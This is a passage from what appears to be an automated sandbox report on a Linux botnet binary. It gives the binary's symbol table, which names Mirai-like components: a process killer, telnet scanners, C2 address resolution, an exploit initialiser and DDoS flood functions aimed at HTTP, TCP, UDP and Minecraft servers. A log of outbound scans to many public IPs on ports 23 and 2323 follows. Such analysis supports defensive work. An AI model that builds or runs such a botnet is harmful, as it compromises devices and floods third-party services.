                  fopen.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  fork.symtab0x40940838FUNC<unknown>DEFAULT2
                  fork.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  fputs_unlocked.symtab0x40ab5056FUNC<unknown>DEFAULT2
                  fputs_unlocked.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  frame_dummy.symtab0x4001500FUNC<unknown>DEFAULT2
                  free.symtab0x40cf97452FUNC<unknown>DEFAULT2
                  free.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  fseek.symtab0x4104045FUNC<unknown>DEFAULT2
                  fseeko.symtab0x4104045FUNC<unknown>DEFAULT2
                  fseeko.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  fseeko64.symtab0x41040c218FUNC<unknown>DEFAULT2
                  fseeko64.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  fstat.symtab0x40e25c82FUNC<unknown>DEFAULT2
                  fstat.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  fstat64.symtab0x40e25c82FUNC<unknown>DEFAULT2
                  fwrite_unlocked.symtab0x40ab88134FUNC<unknown>DEFAULT2
                  fwrite_unlocked.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  get_hosts_byname_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  getc_unlocked.symtab0x411394222FUNC<unknown>DEFAULT2
                  getdents64.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  getdtablesize.symtab0x40e3dc35FUNC<unknown>DEFAULT2
                  getdtablesize.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  getegid.symtab0x40e40038FUNC<unknown>DEFAULT2
                  getegid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  geteuid.symtab0x40e42838FUNC<unknown>DEFAULT2
                  geteuid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  getgid.symtab0x40e45038FUNC<unknown>DEFAULT2
                  getgid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  gethostbyname.symtab0x40b98c53FUNC<unknown>DEFAULT2
                  gethostbyname.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  gethostbyname_r.symtab0x40b9c4897FUNC<unknown>DEFAULT2
                  gethostbyname_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  getpagesize.symtab0x40e47819FUNC<unknown>DEFAULT2
                  getpagesize.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  getpid.symtab0x40943038FUNC<unknown>DEFAULT2
                  getpid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  getppid.symtab0x40945838FUNC<unknown>DEFAULT2
                  getppid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  getrlimit.symtab0x40e48c40FUNC<unknown>DEFAULT2
                  getrlimit.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  getrlimit64.symtab0x40e48c40FUNC<unknown>DEFAULT2
                  getsockname.symtab0x40bda041FUNC<unknown>DEFAULT2
                  getsockname.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  getsockopt.symtab0x40bdcc50FUNC<unknown>DEFAULT2
                  getsockopt.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  getuid.symtab0x40e4b438FUNC<unknown>DEFAULT2
                  getuid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  h.5284.symtab0x51a8e032OBJECT<unknown>DEFAULT10
                  h_errno.symtab0x51a9404OBJECT<unknown>DEFAULT10
                  i.symtab0x5185e44OBJECT<unknown>DEFAULT10
                  index.symtab0x40f2b0417FUNC<unknown>DEFAULT2
                  inet_addr.symtab0x410d7028FUNC<unknown>DEFAULT2
                  inet_aton.symtab0x40f7fc137FUNC<unknown>DEFAULT2
                  inet_aton.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  inet_makeaddr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  inet_ntop.symtab0x40b77c527FUNC<unknown>DEFAULT2
                  inet_ntop4.symtab0x40b664280FUNC<unknown>DEFAULT2
                  inet_pton.symtab0x40b477493FUNC<unknown>DEFAULT2
                  inet_pton4.symtab0x40b3f0135FUNC<unknown>DEFAULT2
                  init_exploit.symtab0x4010f0536FUNC<unknown>DEFAULT2
                  initfini.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  initstate.symtab0x40d342110FUNC<unknown>DEFAULT2
                  initstate_r.symtab0x40d5a3185FUNC<unknown>DEFAULT2
                  ioctl.symtab0x409480104FUNC<unknown>DEFAULT2
                  ioctl.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  ipState.symtab0x51860040OBJECT<unknown>DEFAULT10
                  isatty.symtab0x40b36425FUNC<unknown>DEFAULT2
                  isatty.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  kill.symtab0x4094e844FUNC<unknown>DEFAULT2
                  kill.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  killer.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  killer_init.symtab0x4008002047FUNC<unknown>DEFAULT2
                  killer_kill.symtab0x40029016FUNC<unknown>DEFAULT2
                  killer_kill_by_port.symtab0x4002a01372FUNC<unknown>DEFAULT2
                  killer_pid.symtab0x51a9a04OBJECT<unknown>DEFAULT10
                  killer_realpath.symtab0x51a9988OBJECT<unknown>DEFAULT10
                  killer_realpath_len.symtab0x5185d04OBJECT<unknown>DEFAULT10
                  lengthd.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  lengthq.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  libc/string/x86_64/memcpy.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  libc/string/x86_64/mempcpy.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  libc/string/x86_64/memset.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  libc/string/x86_64/strchr.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  libc/string/x86_64/strcmp.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  libc/string/x86_64/strcpy.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  libc/string/x86_64/strcspn.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  libc/string/x86_64/strlen.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  libc/string/x86_64/strpbrk.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  libc/string/x86_64/strspn.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  libc/sysdeps/linux/x86_64/crt1.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  libc/sysdeps/linux/x86_64/crti.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  libc/sysdeps/linux/x86_64/crtn.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  libc/sysdeps/linux/x86_64/vfork.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  listFork.symtab0x4010405FUNC<unknown>DEFAULT2
                  listen.symtab0x40be0044FUNC<unknown>DEFAULT2
                  listen.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  llseek.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  lseek.symtab0x40e4e445FUNC<unknown>DEFAULT2
                  lseek.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  lseek64.symtab0x40e4dc5FUNC<unknown>DEFAULT2
                  main.symtab0x4023901595FUNC<unknown>DEFAULT2
                  main.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  malloc.symtab0x40c0a82149FUNC<unknown>DEFAULT2
                  malloc.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  malloc_trim.symtab0x40d15b28FUNC<unknown>DEFAULT2
                  max.symtab0x5185e04OBJECT<unknown>DEFAULT10
                  memchr.symtab0x40f538240FUNC<unknown>DEFAULT2
                  memchr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  memcpy.symtab0x40ac10102FUNC<unknown>DEFAULT2
                  memmove.symtab0x40aec4734FUNC<unknown>DEFAULT2
                  memmove.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  mempcpy.symtab0x40f25090FUNC<unknown>DEFAULT2
                  memrchr.symtab0x40f628237FUNC<unknown>DEFAULT2
                  memrchr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  memset.symtab0x40ac80210FUNC<unknown>DEFAULT2
                  mmap.symtab0x40e19448FUNC<unknown>DEFAULT2
                  mmap.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  mozie.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  mremap.symtab0x40e51442FUNC<unknown>DEFAULT2
                  mremap.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  munmap.symtab0x40e54038FUNC<unknown>DEFAULT2
                  munmap.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  mylock.symtab0x5183a040OBJECT<unknown>DEFAULT9
                  mylock.symtab0x5183e040OBJECT<unknown>DEFAULT9
                  mylock.symtab0x51a96040OBJECT<unknown>DEFAULT10
                  nanosleep.symtab0x40e56838FUNC<unknown>DEFAULT2
                  nanosleep.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  next_start.1440.symtab0x51a6c08OBJECT<unknown>DEFAULT10
                  ntop.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  object.2814.symtab0x5185a048OBJECT<unknown>DEFAULT10
                  open.symtab0x409514106FUNC<unknown>DEFAULT2
                  open.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  opendir.symtab0x4097a4243FUNC<unknown>DEFAULT2
                  opendir.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  opennameservers.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  p.2759.symtab0x5180480OBJECT<unknown>DEFAULT9
                  pending_connection.symtab0x5185d41OBJECT<unknown>DEFAULT10
                  poll.symtab0x4102c841FUNC<unknown>DEFAULT2
                  poll.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  prctl.symtab0x40958c44FUNC<unknown>DEFAULT2
                  prctl.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  prefix.4494.symtab0x41647512OBJECT<unknown>DEFAULT4
                  printf.symtab0x409960157FUNC<unknown>DEFAULT2
                  printf.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  qual_chars.4498.symtab0x41649020OBJECT<unknown>DEFAULT4
                  raise.symtab0x41025818FUNC<unknown>DEFAULT2
                  raise.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  rand.symtab0x40d28c11FUNC<unknown>DEFAULT2
                  rand.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  rand.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  rand_alphastr.symtab0x405f30311FUNC<unknown>DEFAULT2
                  rand_init.symtab0x405ef059FUNC<unknown>DEFAULT2
                  rand_next.symtab0x405ea072FUNC<unknown>DEFAULT2
                  rand_str.symtab0x406070218FUNC<unknown>DEFAULT2
                  random.symtab0x40d29872FUNC<unknown>DEFAULT2
                  random.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  random_poly_info.symtab0x41712040OBJECT<unknown>DEFAULT4
                  random_r.symtab0x40d4a090FUNC<unknown>DEFAULT2
                  random_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  randtbl.symtab0x518460128OBJECT<unknown>DEFAULT9
                  rawmemchr.symtab0x410c00190FUNC<unknown>DEFAULT2
                  rawmemchr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  read.symtab0x4095b839FUNC<unknown>DEFAULT2
                  read.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  read_etc_hosts_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  readdir.symtab0x409898143FUNC<unknown>DEFAULT2
                  readdir.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  readlink.symtab0x4095e039FUNC<unknown>DEFAULT2
                  readlink.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  realloc.symtab0x40ca08857FUNC<unknown>DEFAULT2
                  realloc.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  recv.symtab0x40be2c11FUNC<unknown>DEFAULT2
                  recv.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  recv_strip_null.symtab0x40681052FUNC<unknown>DEFAULT2
                  recvfrom.symtab0x40be3845FUNC<unknown>DEFAULT2
                  recvfrom.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  resolv.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  resolv_domain_to_hostname.symtab0x406180100FUNC<unknown>DEFAULT2
                  resolv_entries_free.symtab0x40615034FUNC<unknown>DEFAULT2
                  resolv_lookup.symtab0x4061f01352FUNC<unknown>DEFAULT2
                  resolve_cnc_addr.symtab0x401050151FUNC<unknown>DEFAULT2
                  resolve_func.symtab0x5180608OBJECT<unknown>DEFAULT9
                  rsck.symtab0x51aa004OBJECT<unknown>DEFAULT10
                  rsck_out.symtab0x51aa0c4OBJECT<unknown>DEFAULT10
                  sbrk.symtab0x40e59074FUNC<unknown>DEFAULT2
                  sbrk.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  scanner.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  scanner10_pid.symtab0x51a9c44OBJECT<unknown>DEFAULT10
                  scanner11_pid.symtab0x51a9c84OBJECT<unknown>DEFAULT10
                  scanner12_pid.symtab0x51a9cc4OBJECT<unknown>DEFAULT10
                  scanner13_pid.symtab0x51a9d84OBJECT<unknown>DEFAULT10
                  scanner2_pid.symtab0x51a9e84OBJECT<unknown>DEFAULT10
                  scanner3_pid.symtab0x51a9c04OBJECT<unknown>DEFAULT10
                  scanner4_pid.symtab0x51a9d04OBJECT<unknown>DEFAULT10
                  scanner5_pid.symtab0x51a9f04OBJECT<unknown>DEFAULT10
                  scanner6_pid.symtab0x51a9e04OBJECT<unknown>DEFAULT10
                  scanner7_pid.symtab0x51a9d44OBJECT<unknown>DEFAULT10
                  scanner8_pid.symtab0x51a9ec4OBJECT<unknown>DEFAULT10
                  scanner9_pid.symtab0x51a9dc4OBJECT<unknown>DEFAULT10
                  scanner_init.symtab0x406a106447FUNC<unknown>DEFAULT2
                  scanner_kill.symtab0x40674016FUNC<unknown>DEFAULT2
                  scanner_pid.symtab0x51aa084OBJECT<unknown>DEFAULT10
                  scanner_rawpkt.symtab0x51866040OBJECT<unknown>DEFAULT10
                  select.symtab0x40960844FUNC<unknown>DEFAULT2
                  select.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  send.symtab0x40be6811FUNC<unknown>DEFAULT2
                  send.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  sendBukkitJoin.symtab0x401ae0714FUNC<unknown>DEFAULT2
                  sendHTTPGET.symtab0x402180313FUNC<unknown>DEFAULT2
                  sendJoin.symtab0x401db0756FUNC<unknown>DEFAULT2
                  sendMotd.symtab0x4015a0356FUNC<unknown>DEFAULT2
                  sendNullping.symtab0x4019b0298FUNC<unknown>DEFAULT2
                  sendRandomBytes.symtab0x401310641FUNC<unknown>DEFAULT2
                  sendRandomName.symtab0x401710670FUNC<unknown>DEFAULT2
                  sendTCP.symtab0x4022c0206FUNC<unknown>DEFAULT2
                  sendUDP.symtab0x4020b0196FUNC<unknown>DEFAULT2
                  sendto.symtab0x40be7448FUNC<unknown>DEFAULT2
                  sendto.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  setsid.symtab0x40963438FUNC<unknown>DEFAULT2
                  setsid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  setsockopt.symtab0x40bea453FUNC<unknown>DEFAULT2
                  setsockopt.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  setstate.symtab0x40d2e098FUNC<unknown>DEFAULT2
                  setstate_r.symtab0x40d3f8168FUNC<unknown>DEFAULT2
                  setup_connection.symtab0x406750179FUNC<unknown>DEFAULT2
                  sigaction.symtab0x40e09d247FUNC<unknown>DEFAULT2
                  sigaction.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  sigaddset.symtab0x40bf0c35FUNC<unknown>DEFAULT2
                  sigaddset.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  sigempty.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  sigemptyset.symtab0x40bf3020FUNC<unknown>DEFAULT2
                  signal.symtab0x40bf44168FUNC<unknown>DEFAULT2
                  signal.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  sigprocmask.symtab0x40965c85FUNC<unknown>DEFAULT2
                  sigprocmask.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  sigsetops.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  sleep.symtab0x40dab4415FUNC<unknown>DEFAULT2
                  sleep.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  snprintf.symtab0x409a00137FUNC<unknown>DEFAULT2
                  snprintf.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  socket.symtab0x40bedc47FUNC<unknown>DEFAULT2
                  socket.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  socket_connect_tcp.symtab0x4029f0171FUNC<unknown>DEFAULT2
                  socket_connect_udp.symtab0x4029d02FUNC<unknown>DEFAULT2
                  spec_and_mask.4497.symtab0x4164b016OBJECT<unknown>DEFAULT4
                  spec_base.4493.symtab0x4164817OBJECT<unknown>DEFAULT4
                  spec_chars.4494.symtab0x4164e021OBJECT<unknown>DEFAULT4
                  spec_flags.4493.symtab0x4164f58OBJECT<unknown>DEFAULT4
                  spec_or_mask.4496.symtab0x4164c016OBJECT<unknown>DEFAULT4
                  spec_ranges.4495.symtab0x4164d09OBJECT<unknown>DEFAULT4
                  sprintf.symtab0x409a8c149FUNC<unknown>DEFAULT2
                  sprintf.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  srand.symtab0x40d3b072FUNC<unknown>DEFAULT2
                  srandom.symtab0x40d3b072FUNC<unknown>DEFAULT2
                  srandom_r.symtab0x40d4fa169FUNC<unknown>DEFAULT2
                  srv_addr.symtab0x51a9b016OBJECT<unknown>DEFAULT10
                  static_id.symtab0x5185302OBJECT<unknown>DEFAULT9
                  static_ns.symtab0x51a9884OBJECT<unknown>DEFAULT10
                  stderr.symtab0x5181308OBJECT<unknown>DEFAULT9
                  stdin.symtab0x5181208OBJECT<unknown>DEFAULT9
                  stdout.symtab0x5181288OBJECT<unknown>DEFAULT9
                  strcasecmp.symtab0x41147448FUNC<unknown>DEFAULT2
                  strcasecmp.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  strchr.symtab0x40f2b0417FUNC<unknown>DEFAULT2
                  strcmp.symtab0x410ac033FUNC<unknown>DEFAULT2
                  strcoll.symtab0x410ac033FUNC<unknown>DEFAULT2
                  strcpy.symtab0x40f460213FUNC<unknown>DEFAULT2
                  strcspn.symtab0x40ad58135FUNC<unknown>DEFAULT2
                  strdup.symtab0x410d3854FUNC<unknown>DEFAULT2
                  strdup.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  strerror_r.symtab0x40b284194FUNC<unknown>DEFAULT2
                  strlen.symtab0x40ade0225FUNC<unknown>DEFAULT2
                  strncat.symtab0x410cc0119FUNC<unknown>DEFAULT2
                  strncat.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  strncpy.symtab0x40f718131FUNC<unknown>DEFAULT2
                  strncpy.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  strnlen.symtab0x40b1a4206FUNC<unknown>DEFAULT2
                  strnlen.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  strpbrk.symtab0x410ae8140FUNC<unknown>DEFAULT2
                  strspn.symtab0x410b78135FUNC<unknown>DEFAULT2
                  strtoimax.symtab0x40d7c010FUNC<unknown>DEFAULT2
                  strtok.symtab0x40b35810FUNC<unknown>DEFAULT2
                  strtok.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  strtok_r.symtab0x40f79c94FUNC<unknown>DEFAULT2
                  strtok_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  strtol.symtab0x40d7c010FUNC<unknown>DEFAULT2
                  strtol.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  strtoll.symtab0x40d7c010FUNC<unknown>DEFAULT2
                  substring.symtab0x40100045FUNC<unknown>DEFAULT2
                  sysconf.symtab0x40dc54351FUNC<unknown>DEFAULT2
                  sysconf.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  system.symtab0x40d65c335FUNC<unknown>DEFAULT2
                  system.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  table.symtab0x51aa20832OBJECT<unknown>DEFAULT10
                  table.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  table_init.symtab0x4084502353FUNC<unknown>DEFAULT2
                  table_key.symtab0x5181144OBJECT<unknown>DEFAULT9
                  table_lock_val.symtab0x408370104FUNC<unknown>DEFAULT2
                  table_retrieve_val.symtab0x40834033FUNC<unknown>DEFAULT2
                  table_unlock_val.symtab0x4083e0104FUNC<unknown>DEFAULT2
                  tcgetattr.symtab0x40b380110FUNC<unknown>DEFAULT2
                  tcgetattr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  time.symtab0x4096b439FUNC<unknown>DEFAULT2
                  time.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  timeout.symtab0x5181104OBJECT<unknown>DEFAULT9
                  times.symtab0x40e5dc39FUNC<unknown>DEFAULT2
                  times.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  tolower.symtab0x40e78c30FUNC<unknown>DEFAULT2
                  tolower.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  type_codes.symtab0x41650024OBJECT<unknown>DEFAULT4
                  type_sizes.symtab0x41651812OBJECT<unknown>DEFAULT4
                  unknown.2050.symtab0x41656814OBJECT<unknown>DEFAULT4
                  unlink.symtab0x4096dc38FUNC<unknown>DEFAULT2
                  unlink.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  unsafe_state.symtab0x51842048OBJECT<unknown>DEFAULT9
                  usleep.symtab0x40ddb452FUNC<unknown>DEFAULT2
                  usleep.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  util.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  util_atoi.symtab0x408e90326FUNC<unknown>DEFAULT2
                  util_fdgets.symtab0x408fe0137FUNC<unknown>DEFAULT2
                  util_itoa.symtab0x409270218FUNC<unknown>DEFAULT2
                  util_local_addr.symtab0x409070120FUNC<unknown>DEFAULT2
                  util_memcpy.symtab0x408e0025FUNC<unknown>DEFAULT2
                  util_memsearch.symtab0x408e4071FUNC<unknown>DEFAULT2
                  util_strcmp.symtab0x40918098FUNC<unknown>DEFAULT2
                  util_strcpy.symtab0x408dc059FUNC<unknown>DEFAULT2
                  util_stristr.symtab0x4090f0132FUNC<unknown>DEFAULT2
                  util_strlen.symtab0x408d9033FUNC<unknown>DEFAULT2
                  util_strncmp.symtab0x4091f0113FUNC<unknown>DEFAULT2
                  util_zero.symtab0x408e2020FUNC<unknown>DEFAULT2
                  vfork.symtab0x40e1c421FUNC<unknown>DEFAULT2
                  vfprintf.symtab0x409d18143FUNC<unknown>DEFAULT2
                  vfprintf.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  vsnprintf.symtab0x409b24199FUNC<unknown>DEFAULT2
                  vsnprintf.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  w.symtab0x5186344OBJECT<unknown>DEFAULT10
                  wait4.symtab0x40e60447FUNC<unknown>DEFAULT2
                  wait4.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  wcrtomb.symtab0x40e7b468FUNC<unknown>DEFAULT2
                  wcrtomb.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  wcsnrtombs.symtab0x40e808140FUNC<unknown>DEFAULT2
                  wcsnrtombs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  wcsrtombs.symtab0x40e7f815FUNC<unknown>DEFAULT2
                  wcsrtombs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  write.symtab0x40970442FUNC<unknown>DEFAULT2
                  write.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  x.symtab0x5186284OBJECT<unknown>DEFAULT10
                  xdigits.3747.symtab0x41710017OBJECT<unknown>DEFAULT4
                  xstatconv.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  y.symtab0x51862c4OBJECT<unknown>DEFAULT10
                  z.symtab0x5186304OBJECT<unknown>DEFAULT10
                  TimestampSource PortDest PortSource IPDest IP
                  Nov 29, 2022 16:27:45.264082909 CET156612323192.168.2.20163.151.162.85
                  Nov 29, 2022 16:27:45.264296055 CET1566123192.168.2.2083.190.241.252
                  Nov 29, 2022 16:27:45.264297962 CET1566123192.168.2.2020.19.233.226
                  Nov 29, 2022 16:27:45.264297962 CET1566123192.168.2.2045.81.142.31
                  Nov 29, 2022 16:27:45.264358997 CET1566123192.168.2.2086.8.87.39
                  Nov 29, 2022 16:27:45.264543056 CET1566123192.168.2.20167.5.212.208
                  Nov 29, 2022 16:27:45.264556885 CET1566123192.168.2.2082.130.119.117
                  Nov 29, 2022 16:27:45.264575958 CET1566123192.168.2.2054.213.36.74
                  Nov 29, 2022 16:27:45.264585018 CET1566123192.168.2.2095.60.53.181
                  Nov 29, 2022 16:27:45.264585018 CET156612323192.168.2.20104.142.173.149
                  Nov 29, 2022 16:27:45.264585018 CET1566123192.168.2.2088.61.106.82
                  Nov 29, 2022 16:27:45.264591932 CET1566123192.168.2.2027.153.74.237
                  Nov 29, 2022 16:27:45.264609098 CET1566123192.168.2.20196.140.221.108
                  Nov 29, 2022 16:27:45.264616013 CET1566123192.168.2.2017.50.61.226
                  Nov 29, 2022 16:27:45.264621973 CET1566123192.168.2.20180.180.89.207
                  Nov 29, 2022 16:27:45.264806986 CET1566123192.168.2.20206.35.61.39
                  Nov 29, 2022 16:27:45.264997959 CET1566123192.168.2.20223.167.249.150
                  Nov 29, 2022 16:27:45.264997959 CET1566123192.168.2.2044.14.123.140
                  Nov 29, 2022 16:27:45.264997959 CET1566123192.168.2.20202.48.66.143
                  Nov 29, 2022 16:27:45.265018940 CET1566123192.168.2.20188.159.123.206
                  Nov 29, 2022 16:27:45.265024900 CET156612323192.168.2.20209.184.177.135
                  Nov 29, 2022 16:27:45.265024900 CET1566123192.168.2.2060.220.164.58
                  Nov 29, 2022 16:27:45.265028954 CET1566123192.168.2.20122.6.32.167
                  Nov 29, 2022 16:27:45.265053988 CET1566123192.168.2.2046.21.99.14
                  Nov 29, 2022 16:27:45.265527964 CET1566123192.168.2.20147.27.52.221
                  Nov 29, 2022 16:27:45.265546083 CET1566123192.168.2.2076.245.236.136
                  Nov 29, 2022 16:27:45.265563965 CET1566123192.168.2.20150.104.214.104
                  Nov 29, 2022 16:27:45.265592098 CET1566123192.168.2.20160.9.111.142
                  Nov 29, 2022 16:27:45.265593052 CET1566123192.168.2.20147.71.201.65
                  Nov 29, 2022 16:27:45.265594006 CET156612323192.168.2.20137.243.81.5
                  Nov 29, 2022 16:27:45.265600920 CET1566123192.168.2.20219.172.207.151
                  Nov 29, 2022 16:27:45.265600920 CET1566123192.168.2.20121.113.44.14
                  Nov 29, 2022 16:27:45.265607119 CET1566123192.168.2.2013.96.107.89
                  Nov 29, 2022 16:27:45.265788078 CET1566123192.168.2.20213.89.225.108
                  Nov 29, 2022 16:27:45.265794039 CET1566123192.168.2.20193.185.85.99
                  Nov 29, 2022 16:27:45.265805960 CET1566123192.168.2.2066.68.113.85
                  Nov 29, 2022 16:27:45.265814066 CET1566123192.168.2.2011.186.151.230
                  Nov 29, 2022 16:27:45.265830040 CET1566123192.168.2.20104.103.254.113
                  Nov 29, 2022 16:27:45.265846968 CET1566123192.168.2.2091.80.118.85
                  Nov 29, 2022 16:27:45.265851974 CET1566123192.168.2.20194.34.99.79
                  Nov 29, 2022 16:27:45.265851974 CET156612323192.168.2.202.206.168.216
                  Nov 29, 2022 16:27:45.265861034 CET1566123192.168.2.20167.10.69.106
                  Nov 29, 2022 16:27:45.266073942 CET1566123192.168.2.2067.26.77.133
                  Nov 29, 2022 16:27:45.266093016 CET1566123192.168.2.2095.62.219.106
                  Nov 29, 2022 16:27:45.266104937 CET1566123192.168.2.2090.208.83.53
                  Nov 29, 2022 16:27:45.266114950 CET1566123192.168.2.2033.201.138.99
                  Nov 29, 2022 16:27:45.266129017 CET1566123192.168.2.20188.218.71.100
                  Nov 29, 2022 16:27:45.266134977 CET1566123192.168.2.2039.27.47.6
                  Nov 29, 2022 16:27:45.266777992 CET1566123192.168.2.2089.138.240.83
                  Nov 29, 2022 16:27:45.266817093 CET156612323192.168.2.2019.135.140.179
                  Nov 29, 2022 16:27:45.266834021 CET1566123192.168.2.20125.194.52.215
                  Nov 29, 2022 16:27:45.266834021 CET1566123192.168.2.20209.151.24.62
                  Nov 29, 2022 16:27:45.266916990 CET1566123192.168.2.20132.74.172.192
                  Nov 29, 2022 16:27:45.266916990 CET1566123192.168.2.20165.244.38.11
                  Nov 29, 2022 16:27:45.267046928 CET1566123192.168.2.202.243.179.168
                  Nov 29, 2022 16:27:45.267046928 CET1566123192.168.2.2016.98.175.232
                  Nov 29, 2022 16:27:45.267137051 CET1566123192.168.2.20102.65.8.106
                  Nov 29, 2022 16:27:45.267138958 CET1566123192.168.2.20120.206.169.201
                  Nov 29, 2022 16:27:45.267195940 CET156612323192.168.2.20197.239.84.85
